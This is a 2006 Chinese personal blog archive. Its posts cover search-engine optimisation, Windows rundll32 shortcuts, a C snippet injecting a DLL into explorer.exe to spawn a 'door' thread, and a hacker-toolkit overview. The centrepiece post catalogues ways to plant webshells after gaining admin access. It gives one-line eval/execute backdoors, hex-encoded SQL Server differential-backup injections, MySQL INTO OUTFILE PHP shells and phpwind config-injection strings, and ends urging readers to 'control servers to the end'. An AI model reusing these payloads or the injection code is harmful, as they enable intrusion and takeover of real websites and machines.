老婆，起床啦　劲哥哥

2006 - 11
日	一	二	三	四	五	六
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30
«月»	2006 - 11	«年»

日志文章列表

2006年11月30日 03:40:40

网站快速列入Google的最佳方法

`

在忙活了一段时间后，网站建成了，接下来作为一个新站站长的你首先想到要做的可能就是让自己的网站早点被搜索引擎收录，早点让访问者通过搜索引擎找到自己的网站，获得一些流量。实际上这也不是什么很困难的事。如果方法对头的话，一般2-4天就可被Google收录。但方法不当的话，十天半月，甚至一两个月也列不上。

一般的方法，大家首先想到的可能是登陆各大搜索引擎，一个个向搜索引擎提交自己的网站URL。这种方法已经过时了，现在已是最被动，最没效的方法。 GoogleGuy也曾说过，向Google提交URL的重要性在降低，这种提交的吸引力对于Google越来越小。对于这部分提交Google的数据更新非常之慢。如果你只使用这种方法可能两个月也列不到Google上。

还有就是向一些公开目录提交，比如 DMOZ.org等。对于一个新的网站，内容还不多，想列入这些大型目录会是相当一个漫长的过程，可能需要很长时间。因此想通过这个被 Google等搜索引擎快速找到，也是不可取的。当然你提交一下，等着慢慢被收录也是可以的。

下面就要说的是最快的最好的方法，那就是获得尽可能多的外部链接。这些链接不一定在链接网站的首页，在其内页就OK。事实上，你的网站刚建成，还没有什么访问量，想找一些好的首页链接也是不太容易的。最好找一些PR值高一点(比如6以上)，内容天天更新而且更新较多的网站，这些网站Google会每天漫游并更新其数据库。当Google漫游这些站点时发现了你的URL，就会顺着URL Crawl你的网站。笔者以前曾多次使用这种方法，非常有效，当然现在不用了，直接在一个稍高PR的网站首页做个链接就OK。

通常使用何种方法2-4天就会被Google和MSN列入。Yahoo稍慢一点，可能需要1-2周，这和其搜索技术有关系。怎么才能在一些PR高，更新快的网站做一些链接呢?其实很简单，很多网站都有论坛或允许评论，做个签名带上自己的网站地址，发几个帖子或评论就行了。但这种URL一定要是活动的，就是点击可以到达你得网站的。根据笔者的经验，Google在发现你的URL之后，当天就会对你的网站漫游，漫游后一到两天，在Google搜索你的网址，就会发现你的网站已被列入了。首次列入的将只是你的首页，这一点Google和MSN一样。

接下来再谈谈前面提过的获得尽量多的链接的原因。如果你只有一个链接，几天内被Google列入是没问题，但首次只是首页，要等到Google收录更多的页面还需要一定时间，可能1-3周。这是因为Google对一个新站的漫游周期会比较长。如果你有较多的链接在外面，当Google漫游那些网站时，发现你的网址就会再次过来Crawl你的网站，越多Google Crawl的越频繁，这时就会深度漫游你的网站，收录更多的页面。这就会大大缩短Google的收录时间，使Google在较短的时间内收录更多的页面。

在对一个新的网站进行收录时，笔者的经验是，Google反应最快，收录最快，MSN 次之，Yahoo最慢。Google几天内列入后，如果链接多的话，过不了几天就会再次收录，在加上你的网站天天更新，内容更新平凡，内部URL结构合理，要不了一个月，就会深度漫游，全部收录你的网页。MSN的列入速度和Google差不多，也是很快的。但一般只是收录首页，到再次收录更多页面时，可能需要2周-3周左右。这期间你到MSN查看你得网站的话，会看到总是一个首页在那里。1-2个月后，MSN对你的网站就可完全收录了。Yahoo的反映是最慢，无论收录首页还是深度Crawl都是最慢的，首次需要1-2周，到完全收录可能需要2-3月。

最后，抛弃那些主动向搜索引擎提交链接的被动办法把，多做一些高质量的外部链接，你会有意想不到的收获。

类别：无分类 | 评论(0) | 浏览(3087) | 收藏

2006年11月30日 03:35:58

网站流量统计，二十六步获得网站流量(新版)

1999年9月的时候，Brett Tabke在Webmaster World论坛写过一篇《26步达到一天15000》。现在已有很多不同，该考虑一个新的“26步计划”献给2006年的站长们了。一些旧的技巧仍然适用（比如，每天写出新内容），但一些已经不再适用（向搜索引擎提交已经不是必要步骤），我们这次就要告诉你什么该做什么不必做。你可能已经了解，要带来流量不是那么容易——要辛苦的劳动、抉择，是件体力活。所以，如果你已经准备好，那就卷起袖子，照着这简单的26步，一年之内，你会得到足够的流量，让你忙到不停歇。

A）关键字研究
在做任何举动之前，先用关键字工具来做一个广泛的调查，看哪些关键字/词适用于你的站点。你的直接竞争对手用的是什么关键词？是不是有一些有市场潜能的关键字你还没有发现？或许你能从中开拓出另一片崭新的境地？

B）域名
如果你希望你的公司名字打出品牌来，那就选一个准确反映它的域名吧。如果你的公司叫chinadefence，那就注册www.chinadefence.net，如果不幸地已被注册，那就用www.chinadefenceall.com。不要用横杠（—），尽量不要超过两个两个词的组合。

C）避免沙盒测试
在你确定关键词和公司名称之后，尽早买下你的域名。尽快的把站点设置弄起来，放上一个简单的页面告诉别人你是谁，做什么的，以及网站详细内容会马上出来云云。保证它被Google和Yahoo!抓取到。（可以提交或者从其他站点连接到该站）

D）创建内容
为你的站点制作30页真实的原创的内容。这会令蜘蛛有东西可取，这也可以让你有机会从搜索引擎结果中了解更多的关键词。

E）站点设计
坚持“保持简单”的方针。调用一个外部CSS文件，清除页面上的Java Script代码，改用一个外部文件来调用它们，不要使用框架，以使用图片的方式使用Flash，千万不要做成整站Flash。不要把站点弄的花里胡哨，让浏览者觉得杂乱。保持整洁、简单。让浏览者可轻易找到需要的东西而不需到处张望。

F）页面大小
你的页面占的KB越小越好——特别是首页。优化那些图片，使页面载入更快。西方的大多数人和企业的网络速度都是很快的，但是在其他国家或者用移动电话可能就不是。如果你的站点载入缓慢，可能它在被访问到之前就已经失去了访问者。

G）可用性
确保你的站点遵循一些可用性规则。记住，人们在其他站点花的时间会更多，所以不要挑战设计习惯。不要使用PDF文件作为在线阅读。对已访问连接使用不同颜色，用好大小标题。查阅更多关于可用性的小知识，它们会让你受益不少。

H) 站点优化
在标题中使用你选取的关键词(最重要)，然后大小标题和文字中也尽量包含。保证你的页面/内容是关于这些关键词的。如果你要卖小玩意，就写关于小玩意的内容。不要只是在文字中重复小玩意这个词。

I) 通站连接
通站连接是指在每一页面都相同的连接。它们帮助新到访者不至于迷路。有时它们在页面左侧，有时在顶部以小块出现。有时它们也会在页面底部。确保你的每个页面都有老式风格的通站连接。我通常在页面顶部放上小块式，在底部放上文字式。看什么方式最适合你用了。

J) 标头
使用加粗标头。人们上网常常只是扫视不会仔细读。所以基本上，他们都能看到的就是标头了。如你的标头不够吸引眼球，人们可能不会在内容上持久停留。如果可以，适量使用关键词。

K) 站点地图
创建一个站点地图，包含站内所有的页面连接。保持更新。它帮助蜘蛛进入每个页面。在主页面放一个指向站点地图的文字连接。

L) 内容
每2~3天添加一个新页，200~500词。内容要原创，不要复制他人。内容越是原创、有用，就会有越多人阅读它，连接到它，最重要的是–以后还会再来。

M) 优化有度
远离过度优化技术。过度优化指不择手段提高排行，使用搜索引擎不认同的方式，如关键字堆叠，门页，隐形文字，什么的。为长久考虑，优化要有度。作弊优化的站点通常最求短期效果，如色情，赌博和黑市。(看看你收到过的垃圾邮件就知道了。)这些作弊站点一般就刚刚足够一次活动周期。

N) 竞争分析
谁在和你争夺市场?到Yahoo用“link:”查查看。象这样：link:http://www.sms55.cn/reg.htmwww.yourdomain.com 学习你的竞争者，也去取得那些网站的连接。最好能取代他们!

O) 提交
提交到5组目录：
1，Dmoz.org和Yahoo（本地的，比如Yahoo.co.uk， Yahoo.ca等等，如果可以的话）
2，找到你的行业目录并不加入他们。如果必须付费，也要看价格是否合理。
3，所在国家或地区的本地目录。
4，其他任何合适的目录。
5，如果你针对当地市场，则一定要加入黄页。(因为搜索引擎会使用这些列表来运作本地搜索。)

P) 博客
建立一个关于你的行业的博客并至少每周写一篇新文章。允许访客留言评论，或者甚至让他们自己在上面写文章。这可以创造更多内容，并使人们记得再回来看有什么新东西。

Q）外部连接
只需将你的网站提交到合适的站点，请他们也连向你，告诉他们这会令他们的访客收益。但不要在这方便花太多时间，如果你有原创的好内容，他们自然会找到你并连向你。记住，如果“内容为王”，那么“连接是后”。远离互惠连接、连接农场、鬼连接以及其他任何非自然的连接。他们不一定会伤害你，但是Google跟踪这一切：你什么时候获得了一个连接、多长时间获得一个连接，谁连着现在连向你的网站，你在哪里住，早餐吃的什么，等等。（有点玩笑，但确实是像那样的）

R）统计
保证你的服务器有个好的统计程序，并好好利用它。如果不能用到好的，就尽可能付费得到一个。如果不知道你的访客的信息，象谁在访问、来自哪些地方、造访频率如何等等，你会因为不具备这些基本的工具而在如何改进网站方面感到困惑。

S）付费点击（PPC）
注册Google AdWords与Yahoo Search Marketing。花一些钱做广告吸引人们到你的网站上来，也可以用它来塑造品牌。PPC会为你的网站固带来固定的客流，当然也会给你的潜在客户更多深入了解的机会。你并不必须做到No.1，甚至不必须做到No.5……只要保证你的广告在你的关键词下面排在搜索结果的第一页就行，注意广告的花费要合理。

T）向前看
在你的市场方向上保持关注最新动态。如果一个新产品会在下一季出来，现在就在网站写一写。先发制人，搜索引擎和连接者都会奖赏你。

U）文章
每周写一篇文章，然后到尽可能多的在线刊物去发布。（附上连接，连回到你的网站）在你自己的网站上也放上这些文章。这不仅会给你的网站创造很多连接，也会促使人们点击到你的网站，最重要的是，在你的访客眼中你会是一个专家！他们也许会开始搜索你的名字来找你的网站呢。

V）研究你的流量
在30到90天后你就会有足够的网站统计数据来做分析了。先用下面这些问题把数据过一遍：
- 你的访客来自哪里？
- 他们用哪些搜索引擎？
- 他们查询什么字、词组？
- 你网站上的哪些页面被访问得最多？
- 你网站上的入口页面是哪些？
- 退出页面呢？
- 访客按照怎样的路径浏览你的网站？

把得到的结果提炼一下，精简你的网站：
- 用最受欢迎的页面鼓励访客过来，为你创造价值。
- 调整你认为最合适的浏览路径。
- 弄明白为何他们从那些退出页面退出。

然后，根据访客来访所用的关键词，细微的调整你的关键词设置。如果你的目标词是“green widgets”，而你的访客通过搜寻“green leather widgets”找到你，那你就应该开始创造一个“leather widgets”的内容了。

W）确认你的提交
3-4个月后，确认一下你是不是已经当初提交的目录所收录，象Dmoz.org等等。如果没有，再提交一次，或者更好的办法是，客气地给编辑写一个email询问原因。最后，发现新的目录，值得提交的话，不要放过。

X）RSS feeds
RSS (Real Simple Syndication或Rich Site Summary) 正成为因特网营销者的有力工具。你可以又简单又快速的给网站添加新内容。文章的feed时常更新，所以你可以跟你的访客（以及搜索引擎）他们需要的东西——新鲜内容！你可以用RSS来推广任何新内容，比如新的页面、文章、blog、新闻稿，等等。

Y）新闻稿
新闻稿是指你提交给媒体机构（报纸、广播、电视、杂志）的书面交流信息，通常用来发布一些有新闻价值的公告。你可以创建任何新的文章、公司信息、产品信息的新闻稿。如果它足够吸引人或者原创，媒体机构的工作人员会将它收录进去，写一份文章报道。有时，可能你的网站地址在纽约时报上被公布了，而你还不知道呢。

Z）保持新鲜内容
记住，每2-3天写一个新页面。我只是简单的这样提一下，但其实这可能是这整片文章中最关键的一点。不停的写！没有新鲜内容，你的网站会在搜索引擎中慢慢落下来。要保持第一，你的网站一定要有你那个领域里最快更新、最新鲜最吸引人的原创内容。

遵循以上26条简单的步骤，我确信，一年之内你的网站必定取得成功。你会获得所在行业的巨大流量、亲眼看到你的事业蒸蒸日上！
所以，开始写吧，把你自己写到第一！

关于作者：
Shawn Campbell是电子商务的活跃分子，参与创立了Red Carpet Web Promotion, Inc.。从1998年起，他就致力于研究和开发市场策略，达到在搜索引擎中的显著效果。Shawn是搜索引擎优化（SEO）领域的先驱之一。

类别：无分类 | 评论(0) | 浏览(2850) | 收藏

2006年11月30日 01:46:34

从后台得到webshell技巧大汇总!!!!

请多帮帮宣传民族网站！www.chinadefence.net

`

动网上传漏洞，相信大家拿下不少肉鸡吧。可以说是动网让upfile.asp上传文件过滤不严的漏洞昭然天下，现在这种漏洞已经基本比较难见到了，不排除一些小网站仍然存在此漏洞。在拿站过程中，我们经常费了九牛两虎之力拿到管理员帐号和密码，并顺利进入了后台，虽然此时与拿到网站webshell还有一步之遥，但还是有许多新手因想不出合适的方法而被拒之门外。因此，我们把常用的从后台得到webshell的方法进行了总结和归纳，大体情况有以下十大方面。

注意：如何进入后台，不是本文讨论范围，其具体方法就不说了，靠大家去自己发挥。此文参考了前人的多方面的资料和信息，在此一并表示感谢。

一、直接上传获得webshell

这种对php和jsp的一些程序比较常见，MolyX BOARD就是其中一例，直接在心情图标管理上传.php类型，虽然没有提示，其实已经成功了，上传的文件url应该是http://www.sms55.cn/reg.htmforums/images/smiles/下，前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名，bo-blog后台可以可以直接上传.php文件，上传的文件路径有提示。以及一年前十分流行的upfile.asp漏洞(动网5.0和6.0、早期的许多整站系统)，因过滤上传文件不严，导致用户可以直接上传webshell到网站任意可写目录中，从而拿到网站的管理员控制权限。

二、添加修改上传类型

现在很多的脚本程序上传模块不是只允许上传合法文件类型，而大多数的系统是允许添加上传类型，bbsxp后台可以添加asa|asP类型，ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp，可以添加.aspasp的文件类型来上传获得webshell。php系统的后台，我们可以添加.php.g1f的上传类型，这是php的一个特性,最后的哪个只要不是已知的文件类型即可，php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是：在上传类型中增加asp ，注意，asp后面是有个空格的，然后在前台上传ASP马，当然也要在后面加个空格！

三、利用后台管理功能写入webshell

上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0，还有leadbbs2.88等，直接在后台修改配置文件，写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是：添加一个新的友情链接，在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符，http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。

四、利用后台管理向配置文件写webshell

利用"""":""//"等符号构造最小马写入程序的配置文件，joekoe论坛，某某同学录，沸腾展望新闻系统，COCOON Counter统计程序等等，还有很多php程序都可以，COCOON Counter统计程序举例，在管理邮箱处添上cnhacker at 263 dot net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker at 263 dot net\":eval request(chr(35))//"，还有一种方法就是写上 cnhacker at 263 dot net"%><%eval request(chr(35))%><%′，这样就会形成前后对应，最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连，需要说明的是数据库插马时候要选前者。再如动易2005，到文章中心管理-顶部菜单设置-菜单其它特效，插入一句话马"%><%execute request("l")%><%′，保存顶部栏目菜单参数设置成功后，我们就得到马地址http://www.sms55.cn/reg.htm网站/admin/rootclass_menu_config.asp。

五、利用后台数据库备份及恢复获得webshell

主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。还可以备份网站asp文件为其他后缀如.txt文件，从而可以查看并获得网页源代码，并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时候，但是有asp系统在运行，利用此方法来查看源代码来获得其数据库的位置，为数据库插马来创造机会，动网论坛就有一个ip地址的数据库，在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法，很多asp程序在即使改了后缀名后也会提示文件非法，通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的，还有一种就是用记事本打开图片文件，随便粘贴一部分复制到asp木马文件头，修改gif后缀后上传也可以突破检测，然后备份为.asp文件，成功得到webshell。

六、利用数据库压缩功能

可以将数据的防下载失效从而使插入数据库的最小马成功运行，比较典型的就是loveyuki的L-BLOG，在友情添加的url出写上<%eval request (chr(35))%>, 提交后，在数据库操作中压缩数据库，可以成功压缩出.asp文件，用海洋的最小马的eval客户端连就得到一个webshell。

七、asp+mssql系统

这里需要提一点动网mssql版，但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片，然后记住其上传路径。写一个本地提交的表单，代码如下：
<form action=http://www.sms55.cn/reg.htm网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">
<p>已上传文件的位置：<input name="Dbpath" type="text" size="80"></p>
<p>要复制到的位置：<input name="backpath" type="text" size="80"></p>
<p><input type="submit" value="提交"></p> </form>
另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里，想要备份的WebShell的相对路径填写在“要复制到的位置”那里，提交就得到我们可爱的WebShell了，恢复代码和此类似，修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台，动网的数据库还原和备份是个摆设，不能执行sql命令备份webshell，只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell，一般后台是显示了绝对路径，只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码，利用动网7.0的注入漏洞可以用差异备份一个webshell，可以用利用上面提到的方法，将conn.asp文件备份成.txt文件而获得库名。
差异备份的主要代码：
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
这段代码中，0x626273是要备份的库名bbs的十六进制，可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制，是lp最小马；0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell，唯一的不足就是备份后的文件过大，如果备份数据库中有防下载的的数据表，或者有错误的asp代码，备份出来的webshell就不会成功运行，利用差异备份是成功率比较高的方法，并且极大的减少备份文件的大小。

八、php+mysql系统

后台需要有mysql数据查询功能,我们就可以利用它执行SELECT ... INTO OUTFILE查询输出php文件，因为所有的数据是存放在mysql里的，所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT ... INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile ′路径’ 就可以获得了一个<?eval($_POST[a]);?>的最小马
′
0x3C3F6576616C28245F504F53545B615D293B3F3E 是我们<?eval($_POST[a]);?>的十六进制，这种方法对phpmyadmin比较普遍，先利用phpmyadmin的路径泄露漏洞，比较典型的是http://www.sms55.cn/reg.htmurl/phpmyadmin/libra9xiaoes/select_lang.lib.php。

就可以暴出路径，php环境中比较容易暴出绝对路径：）。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法，也可以写个vbs添加系统管理员的脚本导出到启动文件夹，系统重起后就会添加一个管理员帐号
CREATE TABLE a(cmd text NOT NULL)
INSERT INTO a(cmd) VALUES(′<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>′)

select cmd from a into outfile ′路径/b.php′
DROP TABLE IF EXISTS a
访问b.php就会生成一个<?eval($_POST[a]);?>的最小马。
如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码：
<?
$sa = fopen("./up/saiy.php","w");
fw9xiaote($sa,"<?eval(\$_POST[a]);?".">");
fclose($sa);
?>
就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马，
最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?> 将会在当前目录生成一个a.php的最小马。
九、phpwind论坛从后台到webshell的三种方式

方式1 模板法
进入后台，风格模版设置，在随便一行写代码，记住，这代码必须顶着左边行写，代码前面不可以有任何字符。
EOT;
eval($a);
p9xiaont <<<EOT
而后得到一个shell为http://www.sms55.cn/reg.htm网站/bbs/index.php。
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’;eval($_POST[’a’]);//

替换为那里可以随意写，而后得到一个shell地址为http://www.sms55.cn/reg.htm网站/bbs/data/bbscache/wordsfb.php。
方式3 用户等级管理
新建立会员组，头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a’;eval($_POST[’a’]);// ，升级点数依然可以随意写。而后得到一个shell地址为http://www.sms55.cn/reg.htm网站/bbs/data/bbscache/level.php。
以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

十、也可以利用网站访问计数系统记录来获得webshell

最明显的就是某私服程序内的阿江计数程序，可以通过http://www.sms55.cn/reg.htm网站/stat.asp?style=text&referer= 代码内容&screenwidth=1024直接提交，即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为count#.asa，我们可以通过http://www.sms55.cn/reg.htm网站/count%23.asa访问得到webshell，由于阿江计数程序过滤了%和+，将最小马改成<SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request("1"))</SCRIPT>替换代码内容处提交，然后用lake2的eval客户端来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次操作。
解决方案

　　由于本文涉及的代码版本很多，所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补，若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补，可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告，若自己发现相关漏洞也可及时通知官方网站。

后记

其实，从后台得到webshell的技巧应该还有很多的，关键是要看大家怎么灵活运用、触类旁通，希望本文的方法能起到抛砖引玉的作用。各位加油吧，让我们将服务器控制到底！

类别：无分类 | 评论(0) | 浏览(2795) | 收藏

2006年11月30日 01:23:07

神秘的命令和快捷方式

命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @3

　　功能: 显示Windows“字体”档案夹。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL main.cpl @4

　　功能: 显示“控制面板－

输入法属性－输入法”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL modem.cpl,,add

　　功能: 执行“添加新调制解调器”向导。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0

　　功能: 显示“控制面板－多媒体属性－音频”属性页。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1

　　功能: 显示“控制面板－多媒体属性－视频”属性页。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2

　　功能: 显示“控制面板－多媒体属性－MIDI”属性页。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3

　　功能: 显示“控制面板－多媒体属性－CD音乐”属性页。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4

　　功能: 显示“控制面板－多媒体属性－设备”属性页。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1

　　功能: 显示“控制面板－声音”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl

　　功能: 显示“控制面板－网路”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl

　　功能: 显示ODBC32资料管理选项视窗。

　　命令列: rundll32.exe shell32.dll,OpenAs_RunDLL

　　功能: 显示指定档案(driveath ilename)的“打开方式”对话框。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL password.cpl

　　功能: 显示“控制面板－密码”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL powercfg.cpl

　　功能: 显示“控制面板－电源管理属性”选项视窗。

　　命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL

　　PrintersFolder

　　功能: 显示Windows“印表机”档案夹。(同rundll32.exe shell32.dll,Control_RunDLLmain.cpl @2)

　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0

　　功能: 显示“控制面板－区域设置属性－区域设置”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1

　　功能: 显示“控制面板－区域设置属性－数字”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2

　　功能: 显示“控制面板－区域设置属性－货币”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3

　　功能: 显示“控制面板－区域设置属性－时间”选项视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4

　　功能: 显示“控制面板－区域设置属性－日期”选项视窗。

　　命令列: rundll32.exe desk.cpl,InstallScreenSaver [萤屏保护档案名]

　　功能: 将指定的萤屏保护档案设置为Windows的屏保，并显示萤屏保护属性视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0

　　功能: 显示“控制面板－系统属性－传统”属性视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1

　　功能: 显示“控制面板－系统属性－设备管理器”属性视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2

　　功能: 显示“控制面板－系统属性－硬体配置档案”属性视窗。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3

　　功能: 显示“控制面板－系统属性－性能”属性视窗。

　　命令列: rundll32.exe user.exe,restartwindows

　　功能: 强行关闭所有程式并重启机器。

　　命令列: rundll32.exe user.exe,exitwindows

　　功能: 强行关闭所有程式并关机。

　　命令列: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl

　　功能: 显示“拨号属性”选项视窗

　　命令列: rundll32.exe shell32.dll,Control_RunDLL themes.cpl

　　功能: 显示“桌面主旨”选项面板

　　当然，不止是VisualBasic，象Delphi.VisualC＋＋等其他程式设计语言也可以通过呼叫外部命令的方法来使用Rundll的这些功能，具体方法这里就不再详细叙述了。灵活的使用Rundll,一定会使你的程式设计轻轻松松，达到事半功倍的效果！

　　<关机快捷方式>

　　(1). 在桌面空白位置按鼠标右键 -> <新建> -> 选<快捷方式>

　　(2). 在<指令行>键入 rundll.exe user.exe,exitwindows

　　(3). 在<选择快捷方式的名称>键入<关闭Window>或你想要的名称 -> 按<完成>

　　<重新启动快捷方式>

　　(1). 重复以上 (1)

　　(2). 在<指令行>键入 rundll.exe user.exe,restartwindow***ec

　　(3). 在<选择快捷方式的名称>键入<重新启动Restart>或你想要的名称 -> 按<完成> RUN - > cmd 或者command

类别：无分类 | 评论(0) | 浏览(2709) | 收藏

2006年11月30日 00:50:42

远程注入代码

=====================================================================================

Copy code

//这段是插入代码
//explorer.exe是要插入的进程,c:\\winnt\\dllTest.dll插入的远线程
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD procid;
zqd();
procid=getprocid("explorer.exe");/*得到进程PID*/
if(procid==0)
return 1;

if( InjectDll("c:\\winnt\\dllTest.dll",procid) )
{
printf("Inject OK!\n");
}
else
{
printf("Inject Fail!\n");
}
return 0;
}

//dll的主函数,door是你可以修改的功能函数
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
{
/*MessageBox(NULL,"In the Dll", "OK", MB_OK);*/
//改进线程
kill();
CreateThread(NULL,NULL,door,NULL,NULL,NULL);
}
default:
return TRUE;
}
return TRUE;
}

===================================================================================

具体下载 http://www.sms55.cn/reg.htmchinafteam.91.tc/远程注入.rar

类别：无分类 | 评论(0) | 浏览(2913) | 收藏

2006年11月30日 00:29:29

<VB，Java，C，Pascal，SQL，ASP，PHP，易语言，IIS，QB教程>

类别：无分类 | 评论(0) | 浏览(2729) | 收藏

2006年11月27日 05:51:30

Java编程版教程帖收集专用帖！

类别：无分类 | 评论(0) | 浏览(9007) | 收藏

2006年11月27日 05:40:54

让我们来偷窥黑客的工具箱

一、密码破译如入无人之境

几乎所有黑客的工具箱内都有密码破解工具。黑客在入侵的第一阶段，通常先尝试破解电脑的密码，而大多数的系统（包括Windows NT 及UNIX）都把密码储存在电脑的特定文件里。黑客偷到这个文件后，就会用工具配合一部字典来进行破解。密码破解工具的作用，就是通过解码得到密码。破解工具能把字典中的每一个字编码后，比较密码编码的“值”，如果两者相符就找出了密码，这种破解方式又称为“强力破解”(brute-force crack)。运转破解工具的系统愈快，解码的时间就愈短。它当然也能用来破解上网账号或电子邮箱的密码。

★L0phtCrack

黑客组织“L0pht重工业”(L0pht Heavy Industries)号称是“白帽黑客精英中的摇滚巨星”，它在1997年发表了L0phtCrack这个软件，功效强大且容易使用，按一个键就可以破解密码，连新手也能操作自如。新版本的功能更是先进，利用一台Pentium II 450 电脑，可在一天内破解所有由字母与数字混合的密码。

☆防御L0phtCrack的基本方法

l.应使密码不易被猜中，比如善用各类符号，避免使用字典上的字词。黑客们公认由字母、数字与符号合成的七位数密码(例如a4%H6# )最难破解。

2.经常改换密码，最好每隔一个月改一次。

3.凡是附带密码机制的项目，例如开机、硬盘、上网、电子邮件等，都要设定密码，不要怕麻烦。

4.有些网站要求使用者先设定一个密码才能进入，此时千万不要填入账号或开机密码，因为很多网站会把网友设置的密码储存在一个数据库内，黑客会先试用这些密码。

5.不要把密码告诉任何人，如果必须这样做，也不要用电话或电子邮件传递。

6.不要用自己的生日、电话号码、车牌号码、姓名或其它的资料当密码，严防身边的黑客。

二、对爱猫发动的战争

★战争拨号机

战争拨号机(War Dialers)的原理很简单，首先它用升序或随机的方式拨接一系列的电话号码，一旦发现隐藏的Modem就能拨号进入系统，并能破解容易猜的密码。战争拨号机对于没有设定密码又使用远程控制软件的个人电脑，可说是百发百中。而企业员工的电脑和公司系统的连接往往就是这种形式。有许多黑客之所以喜欢从员工的家用电脑下手，就是这个道理。很多公司为了防黑，花了很多时间和金钱建立防火墙，认为必然万无一失，可是防火墙只护住了网络的前门，内部网络中一些没有登录过的Modem却为黑客准备了一个更方便进出的后门，战争拨号机能利用它们进入你的网络。显然，这是黑客最爱的工具之一。

☆防御战争拨号机的方法

